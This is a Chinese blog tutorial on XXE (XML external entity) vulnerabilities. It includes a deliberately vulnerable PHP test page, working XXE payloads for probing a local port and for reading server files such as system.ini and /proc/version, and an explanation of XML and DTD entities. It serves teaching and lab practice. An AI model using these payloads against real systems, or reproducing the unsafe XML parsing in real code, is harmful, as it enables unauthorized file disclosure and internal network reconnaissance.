XXE:XML外部实体引入

最新推荐文章于 2024-07-21 22:31:02 发布
最新推荐文章于 2024-07-21 22:31:02 发布
阅读量238 收藏 6
点赞数 17
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h1008685/article/details/140583733
版权

XXE漏洞

如果服务器没有对客户端的xml数据进行限制,且版本较低的情况下,就可能会产生xxe漏洞

漏洞利用流程

1.客户端发送xml文件,其中dtd存在恶意的外部实体引用

2.服务器进行解析

3.服务器返回实体引用内容

危害:任意文件读取,系统命令执行

实例

靶场代码[可替换为pikachu靶场]

<head><meta charset=utf-8>
	<title>xxe测试</title>
</head>
<body>
	<form action='' method='post'>xml数据:<br>
		<textarea type="text" name="data"></textarea>
		<br><input type='submit' value='提交' name='sub'>
	</form>
</body>

<?php
  date_default_timezone_set("PRC");
  if(!empty($_POST['sub'])){ 
  	$data= $_POST['data'];
    $xml = simplexml_load_string($data);
    print($xml); 
  }
?>

页面效果

1.使用xxe获取服务器端口信息

paylod

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE BookInfo[<!ENTITY xxe  SYSTEM "http://127.0.0.1:3306">]>

<BookInfo>
&xxe;
</BookInfo>

运行逻辑

  • 当XML文档被一个存在xxe漏洞的XML解析器处理时,解析器会首先解析DTD部分,包括其中的外部实体定义。
  • 然后,解析器会尝试解析xxe实体,根据定义,会向http://127.0.0.1:3306发起请求,尝试获取数据。
  • 如果端口开启,会正常响应,如果关闭页面加载异常

2.任意文件读取

paylod

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE BookInfo[<!ENTITY xxe  SYSTEM "file:///c://windows//system.ini">]>

<BookInfo>
&xxe;
</BookInfo>

在一些XML解析器中,使用两个斜杠可以确保路径被正确解析,尤其是在跨平台环境中。例如,Windows系统通常使用反斜杠(\)作为路径分隔符,而UNIX/Linux系统使用正斜杠(/)。通过使用两个斜杠,确保路径在不同的操作系统中都能被正确解析。

windows路径:file:///c://windows//system.ini

linux路径:file:///proc/version

XML基础

XML翻译为可扩展的标记语言,与html相比,XML可自定义文档标签,扩展性较强

用途:存储配置文件,数据交换

XML格式要求

XML文档必须有根元素
XML文档必须有关闭标签
XML标签对大小写敏感
XML元素必须被正确的嵌套
XML属性必须加引号

基础XML内容

<?xml version="1.0" encoding="UTF-8"?>
<BookInfo>
    <Book>
        <Title>书名</Title>
        <Author>张三</Author>
        <Publisher>出版社</Publisher>
        <PublicationYear>2024</PublicationYear>
        <ISBN>6226097558881666</ISBN>
        <Genre>类型</Genre>
        <Price>1000</Price>
        <Description>书籍简介</Description>
    </Book>
    <Seller>
        <Id>6222083803003983</Id>
        <Name>李四</Name>
    </Seller>
</BookInfo>

文档构成

文档第一行为xml声明文件描述xml版本及编码信息

<?xml version="1.0" encoding="UTF-8"?>

文档根元素为 <BookInfo> 闭合标签为 </BookInfo>

文档根元素下具有 <Book> 和 <Seller> 子元素

其子元素下,有若干个子元素进行信息的包含。如书籍的,作者[张三],年份,类型。购买者的信息如 序列号和姓名

这些元素构建成了·xml文档对信息进行描述和传递

XML文档规范

当xml文件内容过多时,为防止内容混乱

引入了DTD(文档类型描述)用于声明文档结构

DTD定义了文档结构及元素的规则

DTD构成

DTD主要由一系列关键字构成,这些关键字定义了XML文档的结构和规则

<!DOCTYPE BookInfo [
<!ELEMENT BookInfo (Book, Seller)> <!-- 定义根元素BookInfo,包含Book和Seller两个元素 -->
<!ELEMENT Book (Title, Author, Publisher, PublicationYear, ISBN, Genre, Price, Description)> <!-- 定义Book元素及其子元素 -->
<!ELEMENT Seller (Id, Name)> <!-- 定义Seller元素及其子元素 -->
]>

 1. 文件类型声明 : !DOCTYPE

关键字DOCTYPE 表明此文件根元素为BookInfo

 2.  [...] : 方括号内的部分是DTD的内部子集。包含了元素和属性的定义。

 3. 元素定义:<!ELEMENT BookInfo (Book, Seller)>

关键字ELEMENT 定义元素下有哪些子元素

DTD实体的定义

实体 相当于提前定义的全局变量的值,可在文档中进行引用

实体的定义

关键字:ENTITY

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE BookInfo[<!ENTITY name "xiaoming">]>

内部实体的引用

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE BookInfo[<!ENTITY name "xiaoming">]>
<BookInfo>
<name>&name;</name>
</BookInfo>

页面效果

外部实体文件及引用

外部实体文件

<!ENTITY name "xiaoming">

文件引用 

DTD关键字SYSTEM引用本地dtd文件,并使用file进行文件的读取

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE BookInfo[<!ENTITY name SYSTEM "file:///D:/test/test.dtd"    >

]>

<BookInfo>
<name>&name;</name>
</BookInfo>

完整的xml文档内容

<!-- 第一部分:XML声明部分 -->
<?xml version="1.0"?>

<!-- 第二部分:文档类型定义 DTD -->
<!DOCTYPE note[
<!-- 外部实体声明 -->
<!ENTITY entity-name SYSTEM "URI/URL">

<!-- 第三部分:文档元素 -->
<note>
  <to>Dave</to>
  <from>GiGi</from>
  <head>Reminder</head>
  <body>fish together</body>
</note>

 

 

Zeddm
关注
  • 17
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XXE(xml外部实体攻击)
HoYim
04-11 4430
1、概念 XXEXML External Entity)是指xml外部实体攻击漏洞。XML外部实体攻击是针对解析XML输入的应用程序的一种攻击。当包含对外部实体的引用的XML输入被弱配置XML解析器处理时,就会发生这种攻击。这种攻击通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。 (简单来说,XXE就是XML外部实体注入。当应用程序允许引用外部实体时,通过构...
WEB安全之XXE实体注入漏洞.pdf
12-12
然而,XML的这种灵活性也引入了安全风险,如XXEXML External Entity Injection,XML外部实体注入漏洞)。 **0x01 XML基础知识** XML文档由XML声明、DTD(Document Type Definition)文档类型定义(可选)和文档...
XXEXML外部实体注入攻击
qq_68163788的博客
02-20 1116
XXEXML External Entity)注入攻击是一种利用XML解析器漏洞的攻击方式。攻击者通过在XML文档中插入恶意的外部实体引用,可以读取本地文件、执行远程请求等操作,从而获取敏感信息或者实施其他攻击。 XXE攻击通常发生在使用XML解析器解析用户输入数据的应用程序中,例如Web应用程序、SOAP服务等。攻击者可以构造包含恶意外部实体引用的XML文档,并将其提交给目标系统进行解析,从而实现攻击目的。
34-XXEXML外部实体注入)
XLbb的博客
05-19 906
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。3、文档结构XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。4、基本的PAYLOAD结构:5、使用DTD实体的攻击方式 :DTD 引用方式(简要了解):1. DTD 内部声明DOCTYPE 根元素 [元素声明]>2. DTD 外部引用。
XMLXXE漏洞 XML外部实体注入攻击
qq_60115503的博客
05-24 1250
XXE:XML External Entity即外部实体,从安全角度理解成XML External attack外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者通过ENTITY伪造外部实体构成,比如PHP中simplexml_load默认情况下会解析外部实体,XXE标志性函数simplexml_load_string()
XXEXML外部实体注入)漏洞
F2444790591的博客
07-10 2056
XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。XML解析依赖库libxml默认开启了对外部实体的引用(libxml
「 典型安全漏洞系列 」05.XML外部实体注入XXE详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-22 1490
标记:指计算机能理解的信息符号(标签),通过这些标签,计算机之间可以处理包含各种信息的HTML、文章等;可扩展性:使用者可以根据需要自行定义标签。下面是一个包含XML声明、文档类型定义(Document Type Definition,DTD)的XML文件样例。
XXE-XML实体注入漏洞
2301_80661529的博客
03-07 1267
DTD(document type definition)文档类型定义用于定义XML文档的结构,它作为xml文件的 一部分位于XML声明和文档元素之间,比如下面DTD它就定义了 XML 的根元素必须是message,根元素下面有一些子元素,所以 XML必须像下 面这么写:其中,DTD需要在!DOCTYPE注释中定义根元素,而后在中括号的[]内使用!ELEMENT注 释定义各元素特征。
XXE-XML外部实体注入 漏洞详解
m0_69043895的博客
04-14 1212
XML指可扩展标记语言(Extensible Markup Language)。XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。它在 HTML 之后开发,来弥补 HTML的不足。HTML 用于定义数据的展示,专注于它应该是什么样子。反之,XML 用于定义数据如何被组织。例如,HTML中,你的标签为<title>、<h1>、<tab1e>,<p>以及其它标签。
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
qq_45612828的博客
08-02 6566
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
WebGoat8-xxe注入漏洞分析
09-15
XML 外部实体XML 1.0 中的一种特性,允许开发者在 XML 文档中引入外部实体,以便在 XML 文档中使用外部资源。 XXE 注入漏洞的类型 XXE 注入漏洞可以分为两种类型:反射型 XXE 和存储型 XXE。反射型 XXE 是指...
xml高级编程4(主页可下载其余部分)
02-27
XXE允许攻击者通过恶意外部实体访问服务器资源,而XSS则涉及注入恶意脚本到XML文档中,欺骗用户执行有害操作。 10. **XML和JSON的比较**:XML和JSON(JavaScript Object Notation)都是数据交换格式,XML具有丰富的...
用c++实现的简单xml解析
11-11
当处理来自不可信来源的XML时,要注意防止XXEXML External Entity)攻击,即恶意用户通过XML实体注入来读取服务器上的敏感文件。 总的来说,C++中的XML解析涵盖了从基础的XML理解到选择合适的库,再到自定义解析...
xml-commons-resolver-1.1.zip
04-20
3. **Entity Resolution**: XML实体解析是XML解析过程的一部分,用于处理XML文档中声明的实体,包括内部实体(如字符实体)和外部实体(如链接到其他文件的实体)。XML Commons Resolver专注于外部实体的解析。 4. ...
Linux chmod 命令简介
地球空间
07-17 572
权限时,因为它会给予所有用户对文件或文件夹的完全访问权限,这可能会带来安全风险。命令用于改变文件或文件夹的访问权限。这会给指定文件夹及其内部的所有文件和子文件夹的所有者读、写和执行的权限,同时给组用户读和执行的权限。这会给指定文件夹及其内部的所有文件和子文件夹的所有者读和写权限,但不允许执行。这会给指定文件夹以及其内部的所有文件和子文件夹的每个用户读、写和执行的权限。这会从指定文件夹及其内部的所有文件和子文件夹的所有用户那里移除写权限。这会给指定文件夹及其内部的所有文件和子文件夹的所有用户添加执行权限。
python之shutil 文件目录操作模块
daxiashangxian的博客
07-17 342
函数用于移动文件或目录。可以用于重命名文件或将文件或目录从一个位置移动到另一个位置。函数会删除目录及其内容。如果只想删除目录中的文件但保留目录结构,可以使用以下方法。函数也可以用于重命名文件或目录。函数用于复制目录及其内容。递归地复制整个目录结构。将源文件复制到目标位置。函数用于递归地删除目录及其内容。参数,可以实现重命名操作。
【cmd】Windows CMD命令整理及示例使用
最新发布
Young_Pro的博客
07-21 664
上述这些命令涵盖了日常使用中的大部分场景,从文件操作、系统维护到网络管理的多个方面。每个命令都有其特定的用途,并且可以通过附加参数来执行更复杂的任务。显示活动的TCP连接、侦听的端口、以太网统计信息、IP路由表和IP统计信息。显示所有适配器的IP地址、子网掩码和默认网关(续)。此命令可用于创建虚拟驱动器。显示所有适配器的IP地址、子网掩码和默认网关。显示包括服务在内的所有当前运行的任务(续)。显示包括服务在内的所有当前运行的任务。显示本地或远程计算机的系统信息(续)。显示或设置可执行文件的搜索路径(续)。
全国产服务器主板:搭载飞腾FT2000+/64处理器的高性能加固服务器
Future_2024的博客
07-18 774
搭载飞腾FT-2000+/64的全国产化服务器主板,拥有丰富的接口,板载独立的显示芯片。100%国产化

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值